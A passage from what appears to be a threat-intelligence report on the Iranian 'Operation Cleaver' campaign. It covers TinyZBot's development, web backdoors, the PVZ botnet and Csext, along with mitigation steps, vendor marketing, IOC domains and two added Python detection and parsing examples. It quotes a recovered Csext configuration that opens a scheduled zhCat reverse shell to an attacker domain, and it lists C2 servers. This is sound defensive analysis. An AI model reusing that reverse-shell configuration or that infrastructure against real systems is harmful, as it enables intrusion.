On May 14, 2013, we noticed a change which assisted in the identification of active targets. The AppUsageId (at this point named AppType) was an identifier used by this organization in order to differentiate between targets infected with TinyZBot, meaning they could effectively run multiple campaigns using the same command and control server and know which target was infected. This also allowed for separate commands to be supplied to different targets without the need for per-bot commands.
At this time, the AppUsageId was total0, but later we observed names which aligned with active targets. The exfiltration email address was also changed to TerafficAnalyzer(at)yahoo.com.

On June 17, 2013, there was an addition that allowed for the loading of configuration data from the PE’s resources. At this time, it was limited to the exfiltration email address. This version was not obfuscated with SmartAssembly.

We do not see a new version of TinyZBot until June 7, 2014. There are quite a few notable improvements, but nowhere near enough to indicate consistent development on the project for a year. SmartAssembly was reused again. A method was added to detect what security related software is installed. Avira antivirus was specifically targeted and disabled, due to its detection of the new keystroke logger module added in this version. This keystroke logger source is publicly available and referred to as DeadkeyLogger. A new string encryption class was added, but the code was copied and pasted from a Microsoft example. The ability to extract Internet Explorer passwords was added. Clipboard monitoring code was added, but not invoked. The emailing features were removed, but the classes which previously contained them were still present but empty. Many more options were enabled to be loaded from PE resources. The ability to add PE resources was added. Another version was compiled on June 7, 2014, with no feature difference.

On June 17, 2014, we see the first instance of Binder_1, which is aptly named, as it is a binder. The legitimate application used in this version of Binder_1 was compiled on August 22, 2013, and is a self-extracting archive of desktop wallpapers, including an image from the game Mirror’s Edge. The TinyZBot included was the version compiled on June 7, 2014.
The version compiled on June 23, 2014, added functionality which allowed screenshots of the desktop to be taken.

On August 2, 2014, we see another version without SmartAssembly obfuscation. A bug fix is made to the keystroke logging method, and clipboard monitoring is enabled.

Three items were compiled on August 18, 2014. Two of them are TinyZBot binaries, which contain a minor key logging bug fix. The third is a new Binder_1 instance, which contains one of the TinyZBot instances compiled that day. The legitimate application included in this binder is called Easy_resume_creator and is a legitimate application named EasyRésuméCreatorPro. This version targeted a major Saudi Arabian oil company.

From August 23 to August 26, 2014, new versions of TinyZBot were compiled with AppUsageIds targeting major oil and gas companies in Qatar and Kuwait, Ministries of Foreign Affairs in the Persian Gulf, and a major airline holding company in the UAE. These versions of TinyZBot moved towards a more modular architecture where each component was in its own .NET assembly. This was presumably done to limit antivirus detection of each individual file as well as allow for dynamic updating of specific modules. All of these were included in their own Binder_1 instance, which also dropped Easy_resume_creator. There also seem to be improved software engineering practices in many locations. FTP upload support was added, with hardcoded credentials of ano:1. This FTP upload functionality points to the command and control server, and is invoked by a command in the SOAP command and control channel. These versions have the capability to install as a service.

On August 25, 2014, the version compiled on August 18 was submitted to a popular virus engine website in a ZIP archive located at http://dl.doosan-job(dot)com/cv/Easy_Resume_Creator-v2.0.zip.
This indicates that TinyZBot is not only being installed while impersonating a résumé creation suite, but is also impersonating potential employers when distributed.

On September 9, 2014, a ZIP file containing TinyZBot and a configuration targeting a major US university with its AppUsageId was created. This was discovered on an anonymous FTP server in the same IP range as dl.doosan-job(dot)com along with other malware.

From September 11 through September 17, 2014, some TinyZBot components were compiled, along with a new dropper. This dropper impersonated a tool to submit a résumé to Teledyne. When executed, the user is prompted to enter personal information, and at the end is given a button to submit the résumé to Teledyne, although nothing is actually submitted. While the user enters this information, their machine is infected with TinyZBot. The AppUsageIds for these versions target a major US-based university as well as an Israeli aerospace company. These versions began to include a new method of installing as a service. The service runs with the name Network Connectivity Manager.

Interesting Notes

TinyZBot, as well as some other tools (Csext, Net Crawler), initially would not run without a command line parameter set. This was likely to avoid detonation-based detection engines. This command line parameter was opensesemi, which is often stored in the application’s code in an obfuscated manner. The binders and droppers for TinyZBot provided this command line argument and others when executing.

TinyZBot uses a dynamic mutex. This was accomplished by combining a static preset prefix with the active process ID. This allowed supplemental tools to keep TinyZBot running by enumerating every process and checking if the process ID and mutex prefix existed. If no mutex and process pair was located, another TinyZBot instance would be started.
Command and Control Servers

• 88.150.214.168, United Kingdom, microsoftactiveservices(dot)com
• 95.211.241.249, Amsterdam, Noord-Holland, Netherlands
• 88.150.214.166, United Kingdom
• 173.192.144.68, Seattle, Washington, USA
• 188.227.180.213, United Kingdom
• 192.111.145.197, Rochester, New York, USA

Backdoors

Multiple backdoors were used by this organization. These are scripts or applications that allowed for command or code execution from outside of the victim network. Many of their backdoors were web applications, added to web servers, so commands can be executed from a browser or client able to communicate with them. This group includes the results of the Shell Creator mentioned in the Attribution section, as well as ASPX backdoors used by Nesha. A PHP shell was also observed, which also included attribution to Nesha in its hashed password.

An ASPX backdoor named Zh0uSh311 was located on live servers as well as recovered from a staging server. This backdoor does not require authentication, and its use appears to be straightforward. Its functionality breaks down into three fairly standard components: SQL queries, executing commands, and uploading files.

Figure 24: The ASPX backdoor named “Zh0uSh3ll”, allowing SQL queries.

This organization utilized backdoors which masqueraded as varying versions of Notepad. They replace the existing Notepad.exe on the infected machine, and when run they call out to a remote server and execute any shell code returned by the remote server. There will be a detailed analysis of these backdoors posted to Cylance’s blog in the future.

PVZ

PVZ is a name for a set of executables used together to create a botnet.
The name PVZ was assigned by us as this is one of the few tools this organization has not named themselves.

Figure 25: The ASPX backdoor named “Zh0uSh3ll”, allowing file

The components are as follows:

• PVZ-In
• PVZ-Out
• Syn Flooder
• LoggerModule
• XYNTService
• Jasus

XYNTService was not developed by the Cleaver team, but instead is a publicly available project which executes an executable as a service.

PVZ-In

The purpose of PVZ-In is to communicate with a command and control server. Communication is primarily unidirectional, as little information is provided from the bot to its command and control server. The known command and control server is located at http://kundenpflege.menrad(dot)de/js/jquery/default.aspx and the command and control protocol only uses HTTP. The commands as well as infected computer information are transferred in the Content-Disposition HTTP header, making the traffic easy to pass over as benign. When a command is received from the server, the results are stored in a central location on disk that the PVZ tools utilize. Command functionality is limited to executing supplied commands, downloading and executing executables, as well as self-updating.

The debug file path for PVZ-In is:

C:\Users\parviz\documents\visual studio 2010\Projects\BotManager\Release\BotManager.pdb

PVZ-In has been observed using the file name ossisvc.exe.

PVZ-Out

PVZ-Out is the other half of the command and control channel, primarily uploading results of commands and keystroke logging data to a remote server. The known command and control server for PVZ-Out is located at http://www.gesunddurchsjahr(dot)de/tor/default.aspx. Much like PVZ-In, this command and control channel communicates with the Content-Disposition HTTP header, but for file data, POST data is supplied.
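As an added defensive illustration (not code from the report or from Cylance), the following Python checks HTTP request records for the pattern the PVZ-In and PVZ-Out descriptions above point at: command-and-control data carried in a top-level Content-Disposition request header. The `Request` record shape, the sample requests and the header values are constructed for this example; the report does not specify how PVZ encodes its data in the header, so the check only asks whether a request-level Content-Disposition header is present at all and whether its value obeys the RFC 6266 grammar. That is enough to surface both well-formed and malformed abuse of the header for analyst review.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Grammar of a Content-Disposition value (RFC 6266 on top of RFC 7230 tokens):
#   disposition-type *( ";" parm-name "=" ( token | quoted-string ) )
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"(?:[^"\\]|\\.)*"'
_PARAM = rf"\s*;\s*{_TOKEN}\s*=\s*(?:{_TOKEN}|{_QUOTED})"
DISPOSITION_RE = re.compile(rf"^\s*{_TOKEN}(?:{_PARAM})*\s*$")


@dataclass
class Request:
    """One client request as a proxy or web server might log it
    (constructed record shape for this example)."""
    method: str
    path: str
    content_type: Optional[str]
    content_disposition: Optional[str]


def classify(req: Request) -> Optional[str]:
    """Return a finding label for a request, or None if nothing stands out.

    Content-Disposition is defined for responses and for the parts of a
    multipart body. A copy sent as a top-level request header is already
    unusual; one on a GET/HEAD (no body to describe) or one that does not
    even parse as disposition-type plus parameters is stronger evidence
    that the header is being used as a covert data channel.
    """
    value = req.content_disposition
    if value is None:
        return None
    if not DISPOSITION_RE.match(value):
        return "malformed-value"
    if req.method.upper() in ("GET", "HEAD"):
        return "header-on-bodyless-method"
    return "unexpected-request-header"


def audit(requests: List[Request]) -> List[Tuple[int, str, str, str]]:
    """Run classify() over a batch and keep only the flagged entries."""
    findings = []
    for index, req in enumerate(requests):
        label = classify(req)
        if label is not None:
            findings.append((index, req.method, req.path, label))
    return findings


# Constructed sample traffic. The paths echo the PVZ C2 URLs quoted in the
# report; the header contents are invented for illustration and are not
# the real PVZ encoding.
SAMPLE_REQUESTS = [
    Request("GET", "/index.html", None, None),
    Request("POST", "/upload", "multipart/form-data; boundary=xyz", None),
    Request("GET", "/js/jquery/default.aspx", None,
            'attachment; filename="WS01-user.txt"'),
    Request("POST", "/tor/default.aspx", "application/octet-stream",
            "HOST=WS01;USER=user;SEQ=12"),
    Request("PUT", "/files/report.bin", "application/octet-stream",
            "inline"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_REQUESTS):
        print(finding)
```

Run as a script it prints the three flagged requests from the constructed sample. The grammar check is deliberately strict: a value that is syntactically valid but sits on a GET is still reported, because the header has no legitimate job there, while a value that fails the grammar is reported on any method.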
Data uploaded is often compressed, which can make it more difficult to detect the exfiltration of sensitive information.

The debug file path for PVZ-Out is:

C:\Users\Parviz\documents\visual studio 2010\Projects\SendModule\Release\SendModule.pdb

PVZ-Out has been observed with the file name osppsvc.exe.

SYN Flooder

SYN Flooder is a simple network based denial of service tool. It is a command line utility capable of being invoked by PVZ-In. Targeting information is supplied via command line parameters.

The debug file path for SYN Flooder is:

C:\Users\parviz\Documents\Visual Studio 2010\Projects\socket-test\Release\socket-test.pdb

SYN Flooder has been observed using the name ossysvc.exe.

Logger Module

Logger Module observes the user’s actions and records them to a file. The recorded actions include mouse clicks, active windows, keypresses, as well as clipboard data. The resulting log is written out to a location where PVZ-Out can exfiltrate it to its command and control server. Logger Module has been observed using the name ospcsvc.exe.

The following command and control servers for Logger Module have been observed:

• 212.87.154.14, Baden-Wurttemberg, Germany, kundenpflege.menrad(dot)de
• 212.87.154.12, Baden-Wurttemberg, Germany, www.gesunddurchsjahr(dot)de

wndTest

WndTest is the evolution of the PVZ tool chain into a single executable. The tool chain is minimized down to command and control communications, keystroke logging, and clipboard monitoring. The command and control still supports upgrading, downloading, and executing of applications, as well as executing batch scripts. WndTest installs as a service and has been observed attempting to impersonate Adobe Report Service. WndTest starts using PHP servers for its command and control server, some of which are listed as defaced sites.
We have seen wndTest communicate with the following servers:

• 209.208.97.44, Orlando, Florida, USA, www.lat(dot)am
• 23.238.17.181, Tulsa, Oklahoma, USA, regulatorfix(dot)com
• 209.208.97.44, Orlando, Florida, USA, www.asiess(dot)com
• 198.50.100.210, Quebec, Canada, halon(dot)com.br
• 207.182.142.68, Columbus, Ohio, USA
• 95.211.191.247, Amsterdam, Noord-Holland, Netherlands

Csext

Csext is a backdoor application developed in C# which runs as a service. Its primary functionality is based on commands supplied by its configuration file. The configuration file is able to store specific commands, which are intended to run at particular times. A recovered configuration is as follows:

    domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3
    %%
    {0}\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\windows\system32\cmd.exe ,taskkill.exe$$/F /PID {pid},00:29,00:35
    %%
    ##

This configuration executes zhCat to connect back to srv01.microsoftwindowsupdate(dot)net (a deceptive domain owned by this group, with falsified Whois data attributing it to Microsoft Investor Relations) with XORed communication using the HTTP protocol on TCP port 443. This zhCat instance is running cmd.exe, effectively making it a reverse connecting shell. This command runs at 00:29 in the morning, and is killed by taskkill at 00:35. This gives the attackers a predictable method to regain access to a compromised network if they ever lose access.

Csext also has email functionality similar to TinyZBot. This email functionality is used to exfiltrate the results of commands from the command file, which can also include requests like gathering user information.
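To turn a recovered configuration like the one above into triage data (callback host, port, spawned program and the nightly time window), here is an added Python parser. It is not Csext's own code and is not from the report. Its reading of the layout is an assumption drawn from the single recovered sample: a definitions section and a scheduled-command section separated by %%, the whole terminated by ##, with each command entry laid out as program$$arguments, kill-program$$kill-arguments, start time, stop time. The {0}, {zhname} and {pid} placeholders are left unresolved because the report does not say what Csext substitutes for them; only named entries such as {domain1} are resolved from the definitions section.

```python
import re
from dataclasses import dataclass
from datetime import time
from typing import Dict, List

# The configuration recovered in the report, reproduced as the input
# (the "(dot)" defanging is kept exactly as printed there).
RECOVERED_CONFIG = (
    "domain1=srv01.microsoftwindowsupdate(dot)net,check.html,3 %% "
    "{0}\\{zhname}$$ -h -x -i {domain1} -p 443 -e c:\\windows\\system32\\cmd.exe ,"
    "taskkill.exe$$/F /PID {pid},00:29,00:35 %% ##"
)


@dataclass
class ScheduledCommand:
    program: str        # program template, e.g. {0}\{zhname}
    args: str           # its argument string, placeholders unresolved
    kill_program: str   # program used to stop it, e.g. taskkill.exe
    kill_args: str
    start: time         # time of day the command is launched
    stop: time          # time of day it is killed


@dataclass
class CsextConfig:
    definitions: Dict[str, List[str]]   # name -> comma-separated fields
    commands: List[ScheduledCommand]


def _parse_clock(text: str) -> time:
    hours, minutes = text.strip().split(":")
    return time(int(hours), int(minutes))


def parse_config(raw: str) -> CsextConfig:
    """Split the recovered format into definitions and scheduled commands.

    Layout assumed from the single sample: sections separated by '%%',
    terminated by '##'. Section 1 holds name=field,field,... definitions;
    section 2 holds one 'run$$args ,kill$$kill-args,HH:MM,HH:MM' entry
    per line.
    """
    body = raw.strip()
    if body.endswith("##"):
        body = body[:-2]
    sections = [s.strip() for s in body.split("%%") if s.strip()]
    if len(sections) != 2:
        raise ValueError("expected a definitions section and a command section")

    definitions: Dict[str, List[str]] = {}
    for line in sections[0].splitlines():
        name, _, rest = line.partition("=")
        definitions[name.strip()] = [f.strip() for f in rest.split(",")]

    commands = []
    for line in sections[1].splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 4:
            raise ValueError(f"unexpected command entry: {line!r}")
        run, kill, start, stop = parts
        program, _, args = run.partition("$$")
        kill_program, _, kill_args = kill.partition("$$")
        commands.append(ScheduledCommand(
            program.strip(), args.strip(), kill_program.strip(),
            kill_args.strip(), _parse_clock(start), _parse_clock(stop)))
    return CsextConfig(definitions, commands)


def resolve(template: str, definitions: Dict[str, List[str]]) -> str:
    """Replace {name} with the first field of a matching definition; leave
    runtime placeholders such as {0}, {zhname} and {pid} untouched."""
    def substitute(match):
        name = match.group(1)
        return definitions[name][0] if name in definitions else match.group(0)
    return re.sub(r"\{(\w+)\}", substitute, template)


def summarize(raw: str) -> List[dict]:
    """Pull the triage-relevant facts out of each scheduled command:
    where it connects, on which port, what it spawns, and when it runs."""
    cfg = parse_config(raw)
    summary = []
    for cmd in cfg.commands:
        args = resolve(cmd.args, cfg.definitions)
        host = re.search(r"-i\s+(\S+)", args)
        port = re.search(r"-p\s+(\d+)", args)
        spawned = re.search(r"-e\s+(\S+)", args)
        summary.append({
            "program": cmd.program,
            "callback_host": host.group(1) if host else None,
            "callback_port": int(port.group(1)) if port else None,
            "spawned_program": spawned.group(1) if spawned else None,
            "window": (cmd.start.strftime("%H:%M"), cmd.stop.strftime("%H:%M")),
            "killed_by": cmd.kill_program,
        })
    return summary


if __name__ == "__main__":
    for entry in summarize(RECOVERED_CONFIG):
        print(entry)
```

The summary for the recovered sample gives the host, port 443, cmd.exe as the spawned program and the 00:29 to 00:35 window, which is exactly the set of facts a responder wants to turn into a firewall rule, a DNS block and a scheduled-time hunting query. The -i, -p and -e switches are read as they appear in the sample; the -h and -x switches are left uninterpreted.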
We have seen Csext configured to communicate with the following servers:

• 78.47.102.90, Germany, srv01.microsoftwindowsupdate(dot)net
• 174.36.195.158, Washington D.C., USA, srv01.microsoftupdateserver(dot)net

MITIGATION

If after reviewing the Indicators of Compromise (IOC) listed in Appendix A, you believe your organization to be a victim of Operation Cleaver, we recommend you consider the following course of action:

1. If inside the United States, contact the Federal Bureau of Investigation (FBI) via either your local FBI team or FBI CYWATCH at 1-855-292-3937 or cywatch@ic.fbi.gov.
2. If outside the United States, contact your local, district, state or federal law enforcement authorities.
3. If you have visibility into the attacks on your company and the tools and expertise to track them down, leverage the IOCs in Appendix A to identify their presence in your network, prevent them from expanding the scope of the compromise, and remove their access immediately.
4. If you do NOT have visibility into the attacks, need help identifying an existing successful compromise in your organization, or more importantly wish to prevent this attack or attacks similar to Operation Cleaver, please contact your security provider.
5. If you wish to contact Cylance for additional details not available in this report, please email opcleaver@cylance.com.
6. If you would like to learn more about Cylance products and professional services, or discuss how Cylance can mitigate Operation Cleaver’s impact to your organization, please contact us directly.
+1 (877) 973 - 3336
opcleaver@cylance.com
www.cylance.com

SPECULATION: THE WHY

Iran in 2014 can probably be best described as galvanizing. They have long been an “enemy” of the west, and the United States in particular, but today’s headlines include a variety of topics from nuclear talks to human rights to terrorism to cyber hacking. Iran continues to be extremely active on the global stage – and thereby on the radar of every superpower [10].

Iran’s cyber sophistication has grown rapidly since the dawn of Stuxnet and they have used hard dollars combined with national pride to help build their cyber army. Few doubt their commitment as a government and nation state to funding and recruiting cyber warriors to infiltrate and damage their enemies. And it has been commonly postulated that almost all activity since 2010 coming out of Iran is associated with retaliation for Stuxnet/Duqu/Flame, which seems natural given the severity of the impact. But they don’t need Stuxnet as motivation to want to hack the world. They have long desired power on the political stage, in particular in the fight for nuclear power autonomy. With the deadlines around the Iranian nuclear discussions pushed to 2015, the attacks may be tied to negotiating power when discussing a pact with the nuclear superpowers of the United States, Britain, France, Germany, Russia and China.

The inner workings of the Iranian government remain largely a mystery to the western world. However, Iran’s control over its people and the private businesses birthed inside has been well reported.
In a 2014 Reuters article, the reporters detail how the secret Iranian organization called “Setad Ejraiye Farmane Hazrate Emam” has become one of the most powerful organizations in the country, capable of taking over properties and businesses, buying controlling interests in numerous sectors including finance, oil, telecommunications and many others, totaling upwards of $95B [11]. Even the US Treasury has documented an extensive fronting of companies in its report on the Execution of Imam Khomeini’s Order (EIKO), which through its two main subsidiaries controls 37 private businesses that are purely front companies for the Iranian government [12].

The history of Iran controlling the usage of the Internet and the very Internet on-ramps into Iran is well known [13], [14]. They have controlled much of the country’s Internet access to date and have taken over controlling interests in those companies to carry out their work. Operation Cleaver’s frequent spin-up and take-down of large IP blocks inside the AFRANET IP space inside Iran, together with Iran’s well recorded investment in cyber warfare [14], leads us to one simple conclusion: Iran is extremely active in the world of hacking.

Involvement with North Korea

Operation Cleaver’s intense focus on critical infrastructure companies, especially in South Korea, hints at information sharing or joint operations with Iran’s partner, North Korea.
In September 2012, Iran signed an extensive technology cooperation agreement with North Korea, which allows for collaboration on a variety of efforts including IT and security [6].

Cyber Moving to Physical

Operation Cleaver’s carefully selected targets, like the oil and gas industry, energy and utility companies, as well as airlines and airports, indicate Iran’s desire to gain deep access into the world’s most critical environments. The end goal of this operation is not known at this time.

University Recruitment

University student recruitment was hinted at within Operation Cleaver and is consistent with Iran’s reported history of active warrior recruitment in the educational space [15].

Overall, there are many reasons that Iran may be pursuing the targets they did in Operation Cleaver. While we may never truly know, it is important to consider all the above and more when trying to understand the why.

CONCLUSION

After tracking the Operation Cleaver team for over two years, we’re led to the inexorable conclusion: the government of Iran, and particularly the Islamic Revolutionary Guard Corps (IRGC), is backing numerous groups and front entities to attack the world’s critical infrastructure.

As security experts in Critical Infrastructure and Key Resources (CIKR), Industrial Control Systems (ICS), Supervisory Control and Data Acquisition (SCADA) systems, Building Management Systems (BMS), embedded systems and fixed-function systems, we know how easy they are to hack. We have worked with countless customers and vendors throughout the years to notify them of vulnerabilities, assist with remediation efforts, and help mitigate threats to their environments.
Unfortunately, many critical infrastructure organizations are unable to secure their complex environments against modern attacks. They fall victim to the “glue flu”, a malaise of feeling stuck, not wanting to change the status quo for fear they will find problems that they have no idea how to prevent. This “security anaphylaxis” spells real disaster.

If Operation Cleaver doesn’t get the world to wake up to what is happening in the silent world of cyber, then perhaps nothing will. Prevention is everything and we should never give up until it’s achieved. Challenge your trusted advisors. Challenge your security vendors. Demand better technology and services to detect, respond, but most importantly PREVENT not just contemporary attacks, but future exotic attacks that have yet to be imagined. That is what truly disruptive and innovative technology is. Don’t settle for anything less.

We hope that by exposing the Operation Cleaver team to the world, current global critical infrastructure victims can be notified, and future victims can be prevented from suffering the consequences of “status quo” security. Unlike United Flight 811, perhaps we can prevent the next disaster.

DEFENDERS, NEVER GIVE UP!
REFERENCES

[1] Aboard Flight 811: Passengers’ Routine Dissolves Into Terror - February 1989
http://www.nytimes.com/1989/02/26/us/aboard-flight-811-passengers-routine-dissolves-into-terror.html
[2] “Forget China: Iran’s Hackers Are American’s Newest Cyber Threat” - February 2014
http://complex.foreignpolicy.com/posts/2014/02/18/forget_china_iran_s_hackers_are_america_s_newest_cyber_threat
[3] “Developments in Iranian Cyber Warfare 2013-2014” - August 2014
http://www.inss.org.il/uploadImages/systemFiles/SiboniKronenfeld.pdf
[4] “Iran ups cyber attacks on Israeli computers: Netanyahu” - June 2013
http://uk.reuters.com/article/2013/06/09/us-israel-iran-cyber-idUKBRE95808H20130609
[5] “Iranians hacked Navy network for four months? Not a surprise.” - February 2014
http://arstechnica.com/information-technology/2014/02/iranians-hacked-navy-network-for-4-months-not-a-surprise/
[6] “Iran and North Korea Sign Technology Treaty to Combat Hostile Malware” - September 2012
http://www.v3.co.uk/v3-uk/news/2202493/iran-and-north-korea-sign-technology-treaty-to-combat-hostile-malware#
[7] “Iran’s Paramilitary Militia Is Recruiting Hackers” - January 2011
http://www.forbes.com/sites/jeffreycarr/2011/01/12/irans-paramilitary-militia-is-recruiting-hackers/
[8] “The Iranian Nuclear Weapon” - January 2014
http://webcache.googleusercontent.com/search?q=cache:eJbMz7vynpQJ:iranredline.org/index.php%3Fid%3D22+&cd=1&hl=en&ct=clnk&gl=us
[9] “HPSR Threat Intelligence Briefing Episode 11, February 2014” - February 2014
http://www8.hp.com/h20195/v2/getpdf.aspx/4AA5-1589ENW.pdf?ver=1.0
[10] “Intel boss’ warning on cyber attacks no joke, say experts” - November 2014
http://www.foxnews.com/world/2014/11/23/intel-boss-warning-on-cyber-attacks-no-joke-say-experts/
[11] “Khamenei controls massive financial empire built on property seizures” - November 2013
http://www.reuters.com/investigates/iran/#article/part1
[12] “Treasury Targets Assets of Iranian Leadership” - June 2013
http://www.treasury.gov/press-center/press-releases/Pages/jl1968.aspx
[13] “Internet Censorship in Iran”
http://en.wikipedia.org/wiki/Internet_censorship_in_Iran
[14] “Iranian Internet - Fact and Faction”
http://surveillance.rsf.org/en/iran/
[15] “Iran readying hacker attacks on U.S. infrastructure, specialists say” - April 2012
http://www.washingtontimes.com/news/2012/apr/25/iran-readying-hacker-attacks-us-infrastructure-spe/?page=all

ABOUT CYLANCE

In the face of growing and evolving threats, traditional cyber protection technologies are now widely considered inadequate. The only way to regain the upper hand against a new generation of attackers is to embrace something entirely new. Something that “thinks” like an attacker. Something that doesn’t rely on a trust model or care about hash lookups. Something with a brain.

“The world has combated cyber threats by doing the same thing over and over again ... it’s the definition of insanity!”
Jeff Moss - Co-Chair of the DHS Community Resiliency Task Force & Founder of BlackHat and DEFCON security conferences

Cylance has eschewed the old foundations that existing cybersecurity products are built upon. Instead, we’ve based our approach on mathematics, machine learning, and data science. This algorithmic approach has been proven to detect – and stop – exponentially more modern threats. Leveraging algorithmic risk modeling, CylancePROTECT protects endpoints from everyday viruses, worms, trojans, and spyware, but unlike other security products, CylancePROTECT offers true future-proof protection against the most malicious threats in the world. Advanced Persistent Threats (APT), 0-days, and exotic exploitation techniques are easily detected and halted with little-to-no impact on the end-user.

Existing reactive solutions rely on a constant stream of signature updates for threat detection, which is not only costly and inconvenient, but also requires “sacrificial lambs”. Only after a previously unseen threat has inflicted damage can the rest of the industry begin to detect it. CylancePROTECT doesn’t require constant updates or even a network connection to protect against so-called “previously undetectable” threats. By identifying and defusing attacks in near real time, before the attack can execute, we can finally do away with the need for a “patient zero”.

As Richard Stiennon, Chief Research Analyst at IT-Harvest, put it, “Many vendors are trying to solve the endpoint problem, yet Cylance is the only one using the power of math to stop malware and with more effectiveness and efficiency than current solutions”.

Interested in seeing what CylancePROTECT can do for your organization? Contact us!

Cylance is one of the fastest growing cybersecurity technology firms in the US.
Cylance’s flagship product CylancePROTECT has been adopted by Fortune 500 companies and government agencies across the globe. Cylance was founded by 27-year security industry luminary Stuart McClure, former Global CTO of McAfee, original founder of Foundstone, and lead author of the international best-selling book Hacking Exposed. In building Cylance, Stuart brought together the best scientific and executive minds from the likes of Cisco, Sourcefire, Google and McAfee. The Cylance board of advisors includes former high-ranking officials from the DHS, the FBI, CIA, and executive titans of business.

CYLANCE PRODUCTS

CylancePROTECT is the only next generation endpoint security product that applies math to mute existing and future malware, viruses, worms, trojans, bots, APTs, 0-days, exploits, adware, spyware and hacking tools – without needing any updates or even a connection to the Internet. The technology is founded on the principle that to fix the industry, you must start from scratch with a way as yet unseen. CylancePROTECT does not rely on signatures of any sort (blacklist or whitelist), behavioral analysis using IOCs, sandboxing analysis, heuristics, micro-virtualization, or dynamic detonation – to detect and prevent malicious files from executing on a target endpoint. While every other endpoint security product must collect a sample, analyze it, and write a signature to detect it, CylancePROTECT can detect malware before it executes by statically analyzing features found in the binary itself.

Features and Benefits of CylancePROTECT:

• Near real time detection of malicious files, even if they’ve never been seen in the wild.
• Can be used to augment existing endpoint security or be deployed as a complete replacement.
• Does not require any signature updates or connection to the cloud.
• An easy-to-use web management console with intuitive workflows.
• Low-impact endpoint agent.

For a demo of CylancePROTECT, contact a Cylance expert today!

Figure 26: Cylance products detect and stop all the malware used in Operation Cleaver, even though the vast majority of the samples are completely missed by the antivirus industry as of this report’s publication.

CYLANCE SERVICES

Cylance’s Professional Services team is available to assist companies affected by this campaign. Cylance is providing consulting to companies that may have been targeted by these advanced threat actors. Cylance will perform initial triage in order to determine the extent to which your company has been affected by this campaign and work towards establishing a containment strategy.

Cylance has two tailored offerings for clients affected by this campaign. The first one includes ICS in our incident response, since many companies affected are in the Critical Infrastructure and Key Resources (CIKR) vertical. The second offering’s focus is to deploy our proprietary tools and methodologies to detect and mitigate the threats posed by Operation Cleaver.

Option 1: ICS Incident Response & APT Detection and Mitigation
Option 2: Detection, Remediation, & Mitigation

For more information on how the Cylance Professional Services team can assess and respond to attacks like the ones observed in Operation Cleaver, contact sales@cylance.com today.

CUSTOM SERVICES, FORENSIC INVESTIGATIONS, INCIDENT RESPONSE, PENETRATION TESTING, COMPROMISE ASSESSMENTS
Uncover previously undiscovered breach and damage. Stop the threat, mitigate risk, and remediate. Check the integrity of your environment and infrastructure. Dig into who, what, where, and when a compromise occurred. Get expert help that addresses YOUR security needs.
ACKNOWLEDGMENTS

Brian Wallace

Brian is a Sr. Security Researcher for Cylance who joined shortly after the company was established. He is best known for his avid botnet research (often going by “botnet_hunter”) and for his novel malware analysis in the A Study in Bots blog series hosted by Cylance. Brian has been a dedicated open-source developer as well as an advocate for public and private anti-botnet operations. Brian actively develops techniques to combat cyber oppositions in positions where resources and leverage are in too limited of supply for conventional means. These techniques, cultivated by Stuart McClure, are the Art of Deterrence. In a previous investigation, Art of Deterrence techniques were successfully used to divert Indonesian hackers motivated by monetary gain away from their highest yielding target group. Brian’s botnet research covers a wide range of topics, from using graph analysis to estimate the amount of ransom that has been paid to a ransomware operator, to utilizing IPv4 scanning techniques to identify and take down point of sale malware panels.

Stuart McClure

Stuart is founder, CEO/President and Chairman of Cylance. Widely recognized for his extensive and in-depth knowledge of security products, Stuart McClure is considered one of the industry’s leading authorities in information security today. A well-published and acclaimed security visionary with currently eleven books in print, McClure is the originating founder of the Hacking Exposed series of books, the most successful security book ever written. From his work, he founded Foundstone in October of 1999, which sold to McAfee in 2004. McClure brings over two decades of technology and executive leadership with profound technical, operational, and financial experience.
Besides Foundstone, Stuart held leadership positions at InfoWorld, Ernst & Young, Kaiser Permanente and a number of government agencies. At McAfee, McClure held numerous positions including SVP/General Manager for the Security Management BU as well as EVP/Global Chief Technology Officer responsible for almost $3B worth of revenues. Today, McClure is CEO of Cylance, a disruptive and innovative startup applying math to the problem of security. Cylance products such as CylancePROTECT prevent the most advanced attacks in the world without signatures or sandboxing, in real time on the endpoint. Cylance Services offer highly specialized security services such as incident response, forensics, compromise assessments and advanced penetration assessments for global critical infrastructure.

Cylance Team

Cylance employees work passionately and tirelessly every day to achieve one goal: protect the world from cyber attacks. And with their efforts in tracking Operation Cleaver, they have achieved that goal. Our endless thanks to all the Cylancers who contributed to this report.

THE OPERATION CLEAVER LOGO

The Operation Cleaver logo, created by Cylance specifically for this report, was inspired by the infamous logo used by the Army of the Guardians of the Islamic Revolution, also known in the west as the Iranian Revolutionary Guard Corps (IRGC). Due to the close connection between the members tracked in this report and the IRGC, it was only fitting to replicate the look and feel of the IRGC's iconography as the anchor for this document's branding.

Army of the Guardians of the Islamic Revolution (IRGC)

The striking visual elements that make up the logo of the IRGC have very specific meanings:

• The clenched fist holding a rifle, most likely an AK-47, represents armed resistance.
• The globe symbolizes the IRGC's worldwide ambitions.
• The book, from which the clenched fist emanates, represents the Qur'an, connecting the religious ideals on which the group was founded to the armed struggle.
• The plants, possibly wheat, represent prosperity.
• The name of the group in Persian, the year in which it was founded and a passage from the Qur'an (8:60), "And make ready against them all you can of power", are represented in text.

Operation Cleaver

Several of the visual elements present in the IRGC logo have been carried over to the Operation Cleaver logo, including:

• A clenched fist, this time holding a cleaver, represents the group's likely connection with the IRGC as well as armed resistance in general.
• The globe in the background represents Operation Cleaver's worldwide reach.
• An ethernet cable connected to the clenched fist represents the nature of these attacks (cyber as opposed to traditional warfare).
• The hex string translates to "Think Evil, Do Good", a mantra our research team lives by.

APPENDIX A: INDICATORS OF COMPROMISE

Indicators of Compromise (IOC)

This Appendix details the IOCs discovered in the investigation of Operation Cleaver. CylancePROTECT prevents the malware used in Operation Cleaver from ever executing.
Domains

doosan-job(dot)com
downloadsservers(dot)com
drivercenterupdate(dot)com
easyresumecreatorpro(dot)com
googleproductupdate(dot)com
googleproductupdate(dot)net
kundenpflege.menrad(dot)de
microsoftactiveservices(dot)com
microsoftmiddleast(dot)com
microsoftonlineupdates(dot)com
microsoftserverupdate(dot)com
microsoftupdateserver(dot)net
microsoftwindowsresources(dot)com
